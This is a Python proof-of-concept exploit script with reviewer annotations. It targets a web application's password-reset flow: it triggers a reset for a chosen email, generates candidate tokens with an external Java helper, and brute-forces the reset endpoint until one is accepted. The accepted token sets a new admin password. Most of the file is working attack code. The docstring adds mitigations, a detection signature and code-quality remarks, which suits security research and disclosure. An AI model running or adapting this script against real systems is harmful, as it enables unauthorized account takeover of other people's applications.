"""Proof-of-concept: brute-forcing a web application's password-reset token.

What the script does, in the order the module-level code at the bottom runs it:

1. ``comiple_hasbruteforcer`` compiles a Java helper (``TokenHashBruteForce.java``,
   not part of this file).
2. ``trigger_pasword_reset_token_email`` POSTs the target e-mail to
   ``resetPassword.action`` so the application issues a reset token.
3. ``genereate_token`` runs the compiled helper and captures its stdout in
   ``final_exploit_list.txt`` -- presumably one candidate token per line
   (the helper's output format is not visible here; inferred from how
   ``bruteforce_token`` consumes the file).
4. ``bruteforce_token`` submits every candidate to ``resetPassword!reset.action``
   until the JSON response reports ``success`` and then prints the accepted
   token and the new password.

Review notes (defender's view):
- Risk: the attack only works if the reset token is predictable enough to be
  enumerated offline and the reset endpoint accepts unlimited attempts.
  Mitigations are the usual ones: tokens drawn from a CSPRNG with ample
  entropy, single-use and short-lived, and rate limiting / lockout on the
  reset endpoint.
- Detection: step 4 produces a burst of POSTs to ``resetPassword!reset.action``
  from one client with the same ``passwd`` and a different ``ctk`` on every
  request; that pattern is the signature to alert on.
- Code quality (left unchanged here): ``proxies`` is defined but never passed
  to ``requests.post``; the ``--port`` help text says "Target Password";
  the compile log is written to ``compile_output.txt.txt``; every failure
  path calls ``sys.exit(0)``, which reports success to the caller; the
  function names carry typos; no request has a timeout, so a stalled
  connection hangs the script.
"""
import requests
import subprocess
import sys
import json

# Defined but unused: none of the requests.post calls below pass proxies=.
proxies = {"http": "http://192.168.1.12:8080", "https": "http://192.168.1.12:8080"}
import argparse

# Command-line arguments are parsed at import time; every function below reads
# them through the module-level ``args`` rather than taking them as parameters.
parser = argparse.ArgumentParser(description="Enter the IP ,email and creds")
parser.add_argument("--email", type=str, help="Target Email")
parser.add_argument("--passwd", type=str, help="Target Password")
parser.add_argument("--host", type=str, help="Target Host")
# NOTE(review): help text is copy-pasted from --passwd; this is the port.
parser.add_argument("--port", type=str, help="Target Password")
parser.add_argument("--context", type=str, help="Target Context")
args = parser.parse_args()


def trigger_pasword_reset_token_email(email: str) -> None:
    """Ask the application to issue a password-reset token for ``email``.

    Sends a single form POST to ``/<context>/resetPassword.action`` built from
    ``args.host``, ``args.port`` and ``args.context``. The response is
    discarded; the token itself is never seen by this script.

    Args:
        email: account address submitted in the ``email`` form field.
    """
    print("[+] Password Reset for admin has been triggered")
    url = "http://"+str(args.host)+":"+str(args.port)+"/"+str(args.context)+"/resetPassword.action"
    # Browser-like headers; the server-side check this is meant to satisfy is
    # not visible from here.
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "keep-alive", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
    data = {"email": str(email), "fromAjax": "true"}
    # No timeout: a non-responding host blocks here indefinitely.
    requests.post(url, headers=headers, data=data)


def comiple_hasbruteforcer() -> str:
    """Compile ``TokenHashBruteForce.java`` with ``javac``.

    Compiler stdout goes to ``compile_output.txt.txt`` (note the doubled
    suffix); stderr is captured and printed on failure.

    Returns:
        ``"DONE"`` when ``javac`` exits 0.

    Raises:
        SystemExit: on a non-zero ``javac`` exit code or any exception while
        launching it. The exit status is ``0`` in both cases, so a caller or
        shell cannot tell failure from success.
    """
    command = ["javac","-cp",".:./commons-codec-1.18.0.jar","TokenHashBruteForce.java"]
    with open("compile_output.txt.txt", "w") as outfile:
        try:
            result = subprocess.run(command, stdout=outfile, stderr=subprocess.PIPE, text=True)
            if result.returncode == 0:
                return "DONE"
            else:
                print(f"Execution failed with return code: {result.returncode}")
                print(f"Error output: {result.stderr}")
                sys.exit(0)
        # Broad catch: covers javac missing from PATH (FileNotFoundError) and
        # anything else; the original exception type is lost in the message.
        except Exception as e:
            print(f"An error occurred: {e}")
            sys.exit(0)


def genereate_token() -> str:
    """Run the compiled ``TokenHashBruteForce`` helper.

    The helper's stdout is written to ``final_exploit_list.txt``, which
    ``bruteforce_token`` later reads line by line. What the helper computes
    is not visible in this file.

    Returns:
        ``"DONE"`` when the helper exits 0.

    Raises:
        SystemExit: on a non-zero exit code or a launch failure (exit status
        ``0`` in both cases, see ``comiple_hasbruteforcer``).
    """
    command = ["java","-cp",".:./commons-codec-1.18.0.jar","TokenHashBruteForce"]
    with open("final_exploit_list.txt", "w") as outfile:
        try:
            result = subprocess.run(command, stdout=outfile, stderr=subprocess.PIPE, text=True)
            if result.returncode == 0:
                print("[+] Tokens are ready for Brute Forcing")
                return "DONE"
            else:
                print(f"Execution failed with return code: {result.returncode}")
                print(f"Error output: {result.stderr}")
                sys.exit(0)
        except Exception as e:
            print(f"An error occurred: {e}")
            sys.exit(0)


def bruteforce_token() -> None:
    """Submit each candidate token from ``final_exploit_list.txt`` to the reset endpoint.

    Each line of the file is stripped and passed to ``password_reset`` together
    with ``args.passwd``. A JSON response whose ``success`` field stringifies to
    ``"true"`` ends the run: the token and password are printed and the process
    exits 0. If no candidate is accepted the function simply returns.

    Side effects: one HTTP POST per line of the file (see module docstring for
    the resulting traffic pattern).
    """
    print("[+] Brute forcing Password Reset Token")
    token_list=[]
    with open("final_exploit_list.txt") as fd:
        token_list=fd.readlines()
    for token in token_list:
        token_to_test=token.strip()
        resp=password_reset(token_to_test,args.passwd)
        # Only JSON replies are inspected; any other Content-Type is skipped
        # silently.
        if "application/json" in resp.headers.get("Content-Type", ""):
            resp_json=json.loads(resp.content)
            if str(resp_json.get("success")).lower()=="true":
                print("[+] Reset Token was: "+str(token_to_test))
                print("[+] username: admin")
                print("[+] password: "+str(args.passwd))
                sys.exit(0)


def password_reset(token: str, password: str) -> requests.Response:
    """POST one reset attempt to ``/<context>/resetPassword!reset.action``.

    Args:
        token: candidate reset token, sent as ``ctk`` and again as
            ``appActionName``.
        password: new password, sent as both ``passwd`` and ``passwd2``.

    Returns:
        The raw ``requests.Response``; the caller decides what counts as
        success. No timeout is set.
    """
    url = "http://"+str(args.host)+":"+str(args.port)+"/"+str(args.context)+"/resetPassword!reset.action"
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "keep-alive", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
    # "_dc" is a fixed value here, presumably a cache-buster copied from a
    # captured request -- its server-side meaning is not visible in this file.
    data = {"ctk": str(token), "automaticLoginAfterReset": "true", "passwd": str(password), "passwd2": str(password), "fromAjax": "true", "_dc": "1745851928642", "appType": '', "appActionName": str(token)}
    resp=requests.post(url, headers=headers, data=data)
    return resp


# Entry sequence: compile -> trigger reset -> generate candidates -> try them.
# Runs on import; there is no ``if __name__ == "__main__":`` guard.
compilation_output=comiple_hasbruteforcer()
if compilation_output=="DONE":
    trigger_pasword_reset_token_email(args.email)
    token_genearated_data=genereate_token()
    if token_genearated_data=="DONE":
        bruteforce_token()